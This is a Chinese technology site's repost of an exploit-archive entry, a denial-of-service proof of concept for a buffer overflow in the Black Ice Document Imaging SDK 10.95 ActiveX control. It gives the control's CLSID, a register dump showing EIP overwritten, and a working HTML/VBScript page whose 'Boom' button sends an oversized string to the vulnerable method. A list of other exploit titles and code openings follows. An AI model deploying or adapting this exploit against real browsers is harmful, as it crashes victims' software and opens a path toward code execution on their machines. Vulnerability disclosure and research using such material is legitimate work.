首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

所属分类: 网络安全 / Exploit 阅读数: 107
收藏 0 赞 0 分享
<!--
Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r
Mail : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2

Version: 10.95


Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:
RegKey Safe for Script: True
RegKey Safe for Init : True
KillBitSet : False

Register:



EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141



ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>



<script language='vbscript'>
Sub Boom
buff = String(14356, "A")
test.GetNumberOfImagesInGifFile buff

End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

更多精彩内容其他人还在看

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

#// Bea Weblogic -- Apache Connector Remote Exploit -1day #// Should stack break latest Windows Server 2003 <address space randomizati
收藏 0 赞 0 分享

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/i
收藏 0 赞 0 分享

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

<!-- Document Imaging SDK Buffer Overflow Vulnerability DoS Proof of concept Author: r0ut3r Mail : writ3r [
收藏 0 赞 0 分享

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Yahoo Messenger 8.1 (latest) Remote DoS Safe for Scripting, Safe for Initialize <html><body> <object id=targ
收藏 0 赞 0 分享

Simple DNS Plus

#!/usr/bin/perl # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit # # usage: sdns-dos.pl <dns server> <dns s
收藏 0 赞 0 分享

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

----------------------------------------------------------------------------- NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow
收藏 0 赞 0 分享

Pligg

#!/usr/bin/perl -w use LWP::UserAgent; use MIME::Base64; use Digest::MD5 qw(md5_hex); use Getopt::Std; getopts('h:', %args
收藏 0 赞 0 分享

CoolPlayer m3u File Local Buffer Overflow Exploit

#!/usr/bin/perl # k`sOSe - 07/29/2008 use warnings; use strict; # http://www.metasploit.com # EXITFUNC=seh, CMD=c:WINDOWSsystem
收藏 0 赞 0 分享

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

#!/usr/bin/perl #/----------------------------------------------- #| /----------------------------------------- | #| | Remote SQL
收藏 0 赞 0 分享

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

<?php @session_start(); ?> <table align=center width=72% height=95% ><tr><td> <?php /* HIOX Ran
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-18